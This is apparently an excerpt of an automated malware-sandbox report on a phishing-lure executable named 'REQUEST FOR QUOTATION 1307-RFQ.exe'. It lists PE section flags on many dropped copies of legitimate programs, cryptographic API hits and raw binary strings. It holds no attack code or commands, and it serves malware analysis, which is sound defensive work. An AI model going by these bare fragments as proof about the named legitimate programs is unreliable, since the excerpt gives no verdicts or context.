Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Acrobat.exe.1.dr	Binary string: \\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\4202392NtQueryObjectRtlNtStatusToDosErrorRtlCompareUnicodeString\Device\WinDFSCdmRedirectorVolume\Device\HarddiskVolumeDirectory<>:"\\|?*Software\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDownbEnableSameObjectCheckbSupportRDSUPDSYSTEM\CurrentControlSet\Control\Terminal Server\ClusterSettingsUvhdEnabledbFilePathPreprocessingUseFileHandleEnabledbFilePathPreprocessingShortcutEnabled"GetFinalPathNameByHandleWGetVolumeInformationByHandleWGetVolumeInformationWacrolock%s%u.%u.%u.tmp%s%s%ssnacnp64.dllsnacnp.dllADC4307573conprnauxnulcomlptshell:::\/:NtQueryInformationFilewin\src\win_utils.ccSameKernelObject check failed: {100184D2-BDC3-477a-B8D3-65548B67914C}_%uLocal\Global\NtQueryVolumeInformationFileSYSTEM\CurrentControlSet\Control\Terminal ServerGlassSessionIduserenv.dllDeriveAppContainerSidFromAppContainerNameGetAppContainerFolderPathNtOpenDirectoryObjectGetAppContainerNamedObjectPath\Sessions\%d\%sNtQueryInformationProcess[ZoneTransfer]
Source: Acrobat.exe.1.dr	Binary string: \??\UNC\\\.\\Device\SftVol\ntdll.dllA:\Device\\\?\/?/UNC/\?\UNC\
Source: VSSVC.exe.1.dr	Binary string: Zx86AMD64sdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_1 \|\| sdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_2ppDependencyInfoAsrVhd::GetDeviceDependencyInformationwszDevicepathpVhdInfoAsrVhd::TraceVirtualDiskInfohDevice != INVALID_HANDLE_VALUEdwErrorAsrVhd::DiskBuildVhdInfowszFileNameGetDeviceDependencyInformation( wszVolume, TRUE, STORAGE_DEPENDENCY_INFO_VERSION_2, &pVhdInfo )pVirtualDiskInfo->m_rgVhdFileInfo::StringCchCopy( STRING_CCH_PARAM( wszVolume ), wszDevicePath )ulLen > 0wszVhdFileNameModified\Device\\\?\GlobalRoot
Source: Acrobat.exe.1.dr	Binary string: win\src\filesystem_policy.ccFailed to process path (recursion detected):Failed to process path: error code:Unexpected error in path processing of:Unexpected error in source path processing of:::$DATA:$I30:$INDEX_ALLOCATION::$INDEX_ALLOCATION\\.\pipe\\\.\mailslot\Invalid path: \/?/?\UNC\Unexpected handle for path: Unexpected handleInvalid Object foundrequested path: actual path: Handle must be NULLCreateKeywin\src\registry_policy.ccUnexpected for: Real path: OpenKey\\?\pipe\NGLWFPipe__INS:(ML;;NW;;;LW)D:P(A;;GA;;;OW)(A;;GA;;;AC)\\?\pipe\\Device\NamedPipe\win\src\named_pipe_policy.ccSameObject check failed: InitializeProcThreadAttributeListUpdateProcThreadAttributewin\src\process_thread_policy.ccCreateProcessWAction: STATUS_ACCESS_DENIEDapp name: command line: NtCreateProcessExntdll.dllNtSuspendProcessNtResumeProcessNtQuerySymbolicLinkObjectNtOpenSymbolicLinkObjectNtClose%d\Sessions\BNOLINKSNtCreateEventNtOpenEventwin\src\signed_policy.ccHandle AccessCheck failed: ntdll.dllkernel32.dllNtAllocateVirtualMemoryNtDuplicateObjectNtFreeVirtualMemoryNtProtectVirtualMemoryNtQuerySectionNtQueryVirtualMemoryNtSignalAndWaitForSingleObjectNtWaitForSingleObjectRtlAllocateHeapRtlAnsiStringToUnicodeStringRtlCreateHeapRtlCreateUserThreadRtlDestroyHeapRtlFreeHeap_strnicmpstrlenwcslenmemcpy_wcsnicmpswprintf_sNtQueryInformationThreadNtCreateFileNtSetInformationFileNtQueryAttributesFileNtQueryFullAttributesFileNtOpenKeyNtCreateKeyNtDeleteValueKeyNtCreateMutantNtOpenMutantNtCreateSectionNtOpenSectionNtAddAtomNtFindAtomNtDeleteAtomNtQueryInformationAtomNtOpenThreadNtOpenProcessNtOpenProcessTokenNtOpenProcessTokenExNtAddAtomExg_ntNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenExCreateThread
Source: VSSVC.exe.1.dr	Binary string: ::StringCchPrintf( wszDevicePath, ARRAYSIZE(wszDevicePath), L"%s\\Device\\Harddisk%d\\Partition%d\\", L"\\\\?\\GLOBALROOT", dwDeviceNumber, pCurPtnEx->PartitionNumber )
Source: Acrobat.exe.1.dr	Binary string: REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 IS_COEX_REPAIR=1 /qn/qb REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 BROADCASTCEFRELOAD=1 \/0\cef_/qn CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /i msiexec.exe/i ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn.msiexec.exe/i ADDLOCAL=OptionalFeatures,DistillerCJKNative,DistillerCJKSupport,PaperCaptureOptional,PreFlightPlugin DISABLE_FIU_CHECK=1 TRANSITION_INSTALL_MODE=4 SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn\msiexec.exeSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList\MRUListAcrobat.exeMRUListAppDoNotTakePDFOwnershipAtLaunch\\\AppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\RtlGetVersionntdll.dllAdobe Systems, IncorporatedAdobe Inc.Adobe Systems Incorporated1.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.2.840.113549.1.9.61.3.6.1.4.1.311.3.3.1kernel32IsWow64ProcessSystem\CurrentControlSet\Control\CitrixProductVersionNumSoftware\Adobe\Acrobat\ExeSoftware\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770/\Click on 'Change' to select default PDF handler#32770ADelRCP.exepropertiesClick on 'Change' to select default PDF handler.pdfShowAppPickerForPDF.exeProgram ManagerPROGMANApplicationClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#3277012Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice.0Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice\InstallerSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfSOFTWARE\Adobe\Acrobat Reader\12{A6EADE66-0000-0000-484E-7E8A45000000}{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinorVersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\.0SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\PATHVersionMajorVersionMinor7760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderDCSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\\InstallerSOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\ENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdf{AC76BA86-0000-00
Source: VSSVC.exe.1.dr	Binary string: )SYSTEM\CurrentControlSet\Control\MiniNTGetRdisk0DeviceNumberDoStorageIoctlCall(hDisk, IOCTL_STORAGE_GET_DEVICE_NUMBER, NULL, 0, (void )&pStorageDeviceNumber)AsrGetSystemVolumeGlobalRootPathpdwDeviceNumber\\?\GLOBALROOT\arcname\multi(0)disk(0)rdisk(0)AsrGetSystemVolumeDevPath(wszDevicePath, ARRAYSIZE(wszDevicePath) )StringCchPrintf( pwszVolume, cchVolume, L"\\\\?\\GLOBALROOT%s", wszDevicePath )pwszVolumepSysInfoNtQuerySystemInformation( SystemSystemPartitionInformation, pSysInfo, cbRequiredSize, &cbRequiredSize)AsrGetSystemVolumeDevPathpDriveLayoutExppPartitionTable::StringCchCopyN( pwszVolume, cchVolume, pSysInfo->SystemPartition.Buffer, (pSysInfo->SystemPartition.Length)/sizeof(WCHAR) )AsrpGetMorePartitionInfohSystemVolumeDoVolumeIoctlCall(hSystemVolume, IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS, NULL, 0, (void )&pSystemVolExtents, NULL)GetRdisk0DeviceNumber(&dwRDisk0DevNumber)AsrGetSystemVolumeGlobalRootPath( wszSysVolPath, ARRAYSIZE(wszSysVolPath) )DoVolumeIoctlCall(hBootVolume, IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS, NULL, 0, (void **)&pBootVolExtents, NULL)pPartitionTableGetBootVolumeGuidName(&pwszBootVolGuidName)hBootVolume%s\Device\Harddisk%d\Partition%d\::StringCchPrintf( wszDevicePath, ARRAYSIZE(wszDevicePath), L"%s\\Device\\Harddisk%d\\Partition%d\\", L"\\\\?\\GLOBALROOT", dwDeviceNumber, pCurPtnEx->PartitionNumber )DiskBuildDevicePartitionPath( 